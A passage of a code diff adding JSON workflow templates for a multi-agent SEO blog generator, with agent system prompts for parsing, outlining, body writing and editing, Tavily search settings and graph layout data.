                        "targetPosition": "left",
                        "type": "agentNode"
                    },
                    {
                        "data": {
                            "form": {
                                "description": "This is an agent for a specific task.",
                                "user_prompt": "This is the order you need to send to the agent."
                            },
                            "label": "Tool",
                            "name": "flow.tool_0"
                        },
                        "dragging": false,
                        "id": "Tool:ThreeWallsRing",
                        "measured": {
                            "height": 48,
                            "width": 200
                        },
                        "position": {
                            "x": -26.93431957115564,
                            "y": 531.4384641920368
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "toolNode"
                    },
                    {
                        "data": {
                            "form": {
                                "description": "This is an agent for a specific task.",
                                "user_prompt": "This is the order you need to send to the agent."
                            },
                            "label": "Tool",
                            "name": "flow.tool_1"
                        },
                        "dragging": false,
                        "id": "Tool:FloppyJokesItch",
                        "measured": {
                            "height": 48,
                            "width": 200
                        },
                        "position": {
                            "x": 414.6786783453011,
                            "y": 499.39483076093194
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "toolNode"
                    },
                    {
                        "data": {
                            "form": {
                                "text": "This is a multi-agent version of the SEO blog generation workflow. It simulates a small team of AI \u201cwriters\u201d, where each agent plays a specialized role \u2014 just like a real editorial team.\n\nInstead of one AI doing everything in order, this version uses a **Lead Agent** to assign tasks to different sub-agents, who then write and edit the blog in parallel. The Lead Agent manages everything and produces the final output.\n\n### Why use multi-agent format?\n\n- Better control over each stage of writing  \n- Easier to reuse agents across tasks  \n- More human-like workflow (planning \u2192 writing \u2192 editing \u2192 publishing)  \n- Easier to scale and customize for advanced users\n\n### Flow Summary:\n\n1. `LeadWriter_Agent` takes your input and creates a plan\n2. It sends that plan to:\n   - `OutlineWriter_Agent`: build blog structure\n   - `BodyWriter_Agent`: write full content\n   - `FinalEditor_Agent`: polish and finalize\n3. `LeadWriter_Agent` collects all results and outputs the final blog post\n"
                            },
                            "label": "Note",
                            "name": "Workflow Overall Description"
                        },
                        "dragHandle": ".note-drag-handle",
                        "dragging": false,
                        "height": 208,
                        "id": "Note:ElevenVansInvent",
                        "measured": {
                            "height": 208,
                            "width": 518
                        },
                        "position": {
                            "x": -336.6586460874556,
                            "y": 113.43253511344867
                        },
                        "resizing": false,
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "noteNode",
                        "width": 518
                    },
                    {
                        "data": {
                            "form": {
                                "text": "**Purpose**:  \nThis is the central agent that controls the entire writing process.\n\n**What it does**:\n- Reads your blog topic and intent\n- Generates a clear writing plan (topic, audience, goal, keywords)\n- Sends instructions to all sub-agents\n- Waits for their responses and checks quality\n- If any section is missing or weak, it can request a rewrite\n- Finally, it assembles all parts into a complete blog and sends it back to you\n"
                            },
                            "label": "Note",
                            "name": "Lead Agent"
                        },
                        "dragHandle": ".note-drag-handle",
                        "dragging": false,
                        "height": 146,
                        "id": "Note:EmptyClubsGreet",
                        "measured": {
                            "height": 146,
                            "width": 334
                        },
                        "position": {
                            "x": 390.1408623279084,
                            "y": 2.6521144030202493
                        },
                        "resizing": false,
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "noteNode",
                        "width": 334
                    },
                    {
                        "data": {
                            "form": {
                                "text": "**Purpose**:  \nThis agent is responsible for building the blog's structure. It creates an outline that shows what the article will cover and how it's organized.\n\n**What it does**:\n- Suggests a blog title that matches the topic and keywords  \n- Breaks the article into sections using H2 and H3 headers  \n- Adds a short description of what each section should include  \n- Assigns SEO keywords to each section for better search visibility  \n- Uses search data (via Tavily Search) to find how similar blogs are structured"
                            },
                            "label": "Note",
                            "name": "Outline Agent"
                        },
                        "dragHandle": ".note-drag-handle",
                        "dragging": false,
                        "height": 157,
                        "id": "Note:CurlyTigersDouble",
                        "measured": {
                            "height": 157,
                            "width": 394
                        },
                        "position": {
                            "x": -60.03139680691618,
                            "y": 595.8208080534818
                        },
                        "resizing": false,
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "noteNode",
                        "width": 394
                    },
                    {
                        "data": {
                            "form": {
                                "text": "**Purpose**:  \nThis agent is in charge of writing the full blog content, section by section, based on the outline it receives.\n\n**What it does**:\n- Takes each section heading from the outline (H2 / H3)\n- Writes a complete paragraph (150\u2013220 words) under each section\n- Naturally includes the keywords provided for that section\n- Uses the Tavily Search tool to add real-world examples, definitions, or facts if needed\n- Makes sure each section is clear, useful, and easy to read\n"
                            },
                            "label": "Note",
                            "name": "Body Agent"
                        },
                        "dragHandle": ".note-drag-handle",
                        "dragging": false,
                        "height": 164,
                        "id": "Note:StrongKingsCamp",
                        "measured": {
                            "height": 164,
                            "width": 408
                        },
                        "position": {
                            "x": 446.54943226110845,
                            "y": 590.9443887062529
                        },
                        "resizing": false,
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "noteNode",
                        "width": 408
                    },
                    {
                        "data": {
                            "form": {
                                "text": "**Purpose**:  \nThis agent reviews, polishes, and finalizes the blog post written by the BodyWriter_Agent. It ensures everything is clean, smooth, and SEO-compliant.\n\n**What it does**:\n- Improves grammar, sentence flow, and transitions  \n- Makes sure the content reads naturally and professionally  \n- Checks whether keywords are present and well integrated (but not overused)  \n- Verifies that the structure follows the correct H1/H2/H3 format  \n"
                            },
                            "label": "Note",
                            "name": "Editor Agent"
                        },
                        "dragHandle": ".note-drag-handle",
                        "dragging": false,
                        "height": 147,
                        "id": "Note:OpenOttersShow",
                        "measured": {
                            "height": 147,
                            "width": 357
                        },
                        "position": {
                            "x": 976.6858726228803,
                            "y": 422.7404806291804
                        },
                        "resizing": false,
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "noteNode",
                        "width": 357
                    }
                ]
            },
            "history": [],
            "messages": [],
            "path": [],
            "retrieval": []
        },
    "avatar": "data:image/jpeg;base64,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"
 }
--- a/agent/templates/image_lingo.json
+++ b/agent/templates/image_lingo.json
--- a/agent/templates/market_generate_seo_blog.json
+++ b/agent/templates/market_generate_seo_blog.json
@ -0,0 +1,915 @@
 {
    "id": 12,
    "title": "Generate SEO Blog",
    "description": "This workflow automatically generates a complete SEO-optimized blog article based on a simple user input. You don’t need any writing experience. Just provide a topic or short request — the system will handle the rest.",
    "canvas_type": "Marketing",
    "dsl": {
            "components": {
                "Agent:BetterSitesSend": {
                    "downstream": [
                        "Agent:EagerNailsRemain"
                    ],
                    "obj": {
                        "component_name": "Agent",
                        "params": {
                            "delay_after_error": 1,
                            "description": "",
                            "exception_comment": "",
                            "exception_default_value": "",
                            "exception_goto": [],
                            "exception_method": null,
                            "frequencyPenaltyEnabled": false,
                            "frequency_penalty": 0.3,
                            "llm_id": "deepseek-chat@DeepSeek",
                            "maxTokensEnabled": false,
                            "max_retries": 3,
                            "max_rounds": 3,
                            "max_tokens": 4096,
                            "mcp": [],
                            "message_history_window_size": 12,
                            "outputs": {
                                "content": {
                                    "type": "string",
                                    "value": ""
                                }
                            },
                            "parameter": "Balance",
                            "presencePenaltyEnabled": false,
                            "presence_penalty": 0.2,
                            "prompts": [
                                {
                                    "content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}",
                                    "role": "user"
                                }
                            ],
                            "sys_prompt": "# Role\n\nYou are the **Outline_Agent**, responsible for generating a clear and SEO-optimized blog outline based on the user's parsed writing intent and keyword strategy.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n  - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n  - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
                            "temperature": 0.5,
                            "temperatureEnabled": true,
                            "tools": [
                                {
                                    "component_name": "TavilySearch",
                                    "name": "TavilySearch",
                                    "params": {
                                        "api_key": "",
                                        "days": 7,
                                        "exclude_domains": [],
                                        "include_answer": false,
                                        "include_domains": [],
                                        "include_image_descriptions": false,
                                        "include_images": false,
                                        "include_raw_content": true,
                                        "max_results": 5,
                                        "outputs": {
                                            "formalized_content": {
                                                "type": "string",
                                                "value": ""
                                            },
                                            "json": {
                                                "type": "Array<Object>",
                                                "value": []
                                            }
                                        },
                                        "query": "sys.query",
                                        "search_depth": "basic",
                                        "topic": "general"
                                    }
                                }
                            ],
                            "topPEnabled": false,
                            "top_p": 0.85,
                            "user_prompt": "",
                            "visual_files_var": ""
                        }
                    },
                    "upstream": [
                        "Agent:ClearRabbitsScream"
                    ]
                },
                "Agent:ClearRabbitsScream": {
                    "downstream": [
                        "Agent:BetterSitesSend"
                    ],
                    "obj": {
                        "component_name": "Agent",
                        "params": {
                            "delay_after_error": 1,
                            "description": "",
                            "exception_comment": "",
                            "exception_default_value": "",
                            "exception_goto": [],
                            "exception_method": null,
                            "frequencyPenaltyEnabled": false,
                            "frequency_penalty": 0.5,
                            "llm_id": "deepseek-chat@DeepSeek",
                            "maxTokensEnabled": false,
                            "max_retries": 3,
                            "max_rounds": 1,
                            "max_tokens": 4096,
                            "mcp": [],
                            "message_history_window_size": 12,
                            "outputs": {
                                "content": {
                                    "type": "string",
                                    "value": ""
                                }
                            },
                            "parameter": "Precise",
                            "presencePenaltyEnabled": false,
                            "presence_penalty": 0.5,
                            "prompts": [
                                {
                                    "content": "The user query is {sys.query}",
                                    "role": "user"
                                }
                            ],
                            "sys_prompt": "# Role\n\nYou are the **Parse_And_Keyword_Agent**, responsible for interpreting a user's blog writing request and generating a structured writing intent summary and keyword strategy for SEO-optimized content generation.\n\n# Goals\n\n1. Extract and infer the user's true writing intent, even if the input is informal or vague.\n\n2. Identify the writing type, target audience, and implied goal.\n\n3. Suggest 3\u20135 long-tail keywords based on the input and context.\n\n4. Output all data in a Markdown format for downstream agents.\n\n# Operating Guidelines\n\n\n- If the user's input lacks clarity, make reasonable and **conservative** assumptions based on SEO best practices.\n\n- Always choose one clear \"Writing Type\" from the list below.\n\n- Your job is not to write the blog \u2014 only to structure the brief.\n\n# Output Format\n\n```markdown\n## Writing Type\n\n[Choose one: Tutorial / Informative Guide / Marketing Content / Case Study / Opinion Piece / How-to / Comparison Article]\n\n## Target Audience\n\n[Try to be specific based on clues in the input: e.g., marketing managers, junior developers, SEO beginners]\n\n## User Intent Summary\n\n[A 1\u20132 sentence summary of what the user wants to achieve with the blog post]\n\n## Suggested Long-tail Keywords\n\n- keyword 1\n\n- keyword 2\n\n- keyword 3\n\n- keyword 4 (optional)\n\n- keyword 5 (optional)\n\n\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\n\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
                            "temperature": 0.2,
                            "temperatureEnabled": true,
                            "tools": [],
                            "topPEnabled": false,
                            "top_p": 0.75,
                            "user_prompt": "",
                            "visual_files_var": ""
                        }
                    },
                    "upstream": [
                        "begin"
                    ]
                },
                "Agent:EagerNailsRemain": {
                    "downstream": [
                        "Agent:LovelyHeadsOwn"
                    ],
                    "obj": {
                        "component_name": "Agent",
                        "params": {
                            "delay_after_error": 1,
                            "description": "",
                            "exception_comment": "",
                            "exception_default_value": "",
                            "exception_goto": [],
                            "exception_method": null,
                            "frequencyPenaltyEnabled": false,
                            "frequency_penalty": 0.5,
                            "llm_id": "deepseek-chat@DeepSeek",
                            "maxTokensEnabled": false,
                            "max_retries": 3,
                            "max_rounds": 5,
                            "max_tokens": 4096,
                            "mcp": [],
                            "message_history_window_size": 12,
                            "outputs": {
                                "content": {
                                    "type": "string",
                                    "value": ""
                                }
                            },
                            "parameter": "Precise",
                            "presencePenaltyEnabled": false,
                            "presence_penalty": 0.5,
                            "prompts": [
                                {
                                    "content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\n\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}",
                                    "role": "user"
                                }
                            ],
                            "sys_prompt": "# Role\n\nYou are the **Body_Agent**, responsible for generating the full content of each section of an SEO-optimized blog based on the provided outline and keyword strategy.\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
                            "temperature": 0.2,
                            "temperatureEnabled": true,
                            "tools": [
                                {
                                    "component_name": "TavilySearch",
                                    "name": "TavilySearch",
                                    "params": {
                                        "api_key": "",
                                        "days": 7,
                                        "exclude_domains": [],
                                        "include_answer": false,
                                        "include_domains": [],
                                        "include_image_descriptions": false,
                                        "include_images": false,
                                        "include_raw_content": true,
                                        "max_results": 5,
                                        "outputs": {
                                            "formalized_content": {
                                                "type": "string",
                                                "value": ""
                                            },
                                            "json": {
                                                "type": "Array<Object>",
                                                "value": []
                                            }
                                        },
                                        "query": "sys.query",
                                        "search_depth": "basic",
                                        "topic": "general"
                                    }
                                }
                            ],
                            "topPEnabled": false,
                            "top_p": 0.75,
                            "user_prompt": "",
                            "visual_files_var": ""
                        }
                    },
                    "upstream": [
                        "Agent:BetterSitesSend"
                    ]
                },
                "Agent:LovelyHeadsOwn": {
                    "downstream": [
                        "Message:LegalBeansBet"
                    ],
                    "obj": {
                        "component_name": "Agent",
                        "params": {
                            "delay_after_error": 1,
                            "description": "",
                            "exception_comment": "",
                            "exception_default_value": "",
                            "exception_goto": [],
                            "exception_method": null,
                            "frequencyPenaltyEnabled": false,
                            "frequency_penalty": 0.5,
                            "llm_id": "deepseek-chat@DeepSeek",
                            "maxTokensEnabled": false,
                            "max_retries": 3,
                            "max_rounds": 5,
                            "max_tokens": 4096,
                            "mcp": [],
                            "message_history_window_size": 12,
                            "outputs": {
                                "content": {
                                    "type": "string",
                                    "value": ""
                                }
                            },
                            "parameter": "Precise",
                            "presencePenaltyEnabled": false,
                            "presence_penalty": 0.5,
                            "prompts": [
                                {
                                    "content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}\n\nThe Body agent output is {Agent:EagerNailsRemain@content}",
                                    "role": "user"
                                }
                            ],
                            "sys_prompt": "# Role\n\nYou are the **Editor_Agent**, responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n\n",
                            "temperature": 0.2,
                            "temperatureEnabled": true,
                            "tools": [],
                            "topPEnabled": false,
                            "top_p": 0.75,
                            "user_prompt": "",
                            "visual_files_var": ""
                        }
                    },
                    "upstream": [
                        "Agent:EagerNailsRemain"
                    ]
                },
                "Message:LegalBeansBet": {
                    "downstream": [],
                    "obj": {
                        "component_name": "Message",
                        "params": {
                            "content": [
                                "{Agent:LovelyHeadsOwn@content}"
                            ]
                        }
                    },
                    "upstream": [
                        "Agent:LovelyHeadsOwn"
                    ]
                },
                "begin": {
                    "downstream": [
                        "Agent:ClearRabbitsScream"
                    ],
                    "obj": {
                        "component_name": "Begin",
                        "params": {
                            "enablePrologue": true,
                            "inputs": {},
                            "mode": "conversational",
                            "prologue": "Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
                        }
                    },
                    "upstream": []
                }
            },
            "globals": {
                "sys.conversation_turns": 0,
                "sys.files": [],
                "sys.query": "",
                "sys.user_id": ""
            },
            "graph": {
                "edges": [
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__beginstart-Agent:ClearRabbitsScreamend",
                        "source": "begin",
                        "sourceHandle": "start",
                        "target": "Agent:ClearRabbitsScream",
                        "targetHandle": "end"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:ClearRabbitsScreamstart-Agent:BetterSitesSendend",
                        "source": "Agent:ClearRabbitsScream",
                        "sourceHandle": "start",
                        "target": "Agent:BetterSitesSend",
                        "targetHandle": "end"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:BetterSitesSendtool-Tool:SharpPensBurnend",
                        "source": "Agent:BetterSitesSend",
                        "sourceHandle": "tool",
                        "target": "Tool:SharpPensBurn",
                        "targetHandle": "end"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:BetterSitesSendstart-Agent:EagerNailsRemainend",
                        "source": "Agent:BetterSitesSend",
                        "sourceHandle": "start",
                        "target": "Agent:EagerNailsRemain",
                        "targetHandle": "end"
                    },
                    {
                        "id": "xy-edge__Agent:EagerNailsRemaintool-Tool:WickedDeerHealend",
                        "source": "Agent:EagerNailsRemain",
                        "sourceHandle": "tool",
                        "target": "Tool:WickedDeerHeal",
                        "targetHandle": "end"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:EagerNailsRemainstart-Agent:LovelyHeadsOwnend",
                        "source": "Agent:EagerNailsRemain",
                        "sourceHandle": "start",
                        "target": "Agent:LovelyHeadsOwn",
                        "targetHandle": "end"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:LovelyHeadsOwnstart-Message:LegalBeansBetend",
                        "source": "Agent:LovelyHeadsOwn",
                        "sourceHandle": "start",
                        "target": "Message:LegalBeansBet",
                        "targetHandle": "end"
                    }
                ],
                "nodes": [
                    {
                        "data": {
                            "form": {
                                "enablePrologue": true,
                                "inputs": {},
                                "mode": "conversational",
                                "prologue": "Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
                            },
                            "label": "Begin",
                            "name": "begin"
                        },
                        "id": "begin",
                        "measured": {
                            "height": 48,
                            "width": 200
                        },
                        "position": {
                            "x": 50,
                            "y": 200
                        },
                        "selected": false,
                        "sourcePosition": "left",
                        "targetPosition": "right",
                        "type": "beginNode"
                    },
                    {
                        "data": {
                            "form": {
                                "delay_after_error": 1,
                                "description": "",
                                "exception_comment": "",
                                "exception_default_value": "",
                                "exception_goto": [],
                                "exception_method": null,
                                "frequencyPenaltyEnabled": false,
                                "frequency_penalty": 0.5,
                                "llm_id": "deepseek-chat@DeepSeek",
                                "maxTokensEnabled": false,
                                "max_retries": 3,
                                "max_rounds": 1,
                                "max_tokens": 4096,
                                "mcp": [],
                                "message_history_window_size": 12,
                                "outputs": {
                                    "content": {
                                        "type": "string",
                                        "value": ""
                                    }
                                },
                                "parameter": "Precise",
                                "presencePenaltyEnabled": false,
                                "presence_penalty": 0.5,
                                "prompts": [
                                    {
                                        "content": "The user query is {sys.query}",
                                        "role": "user"
                                    }
                                ],
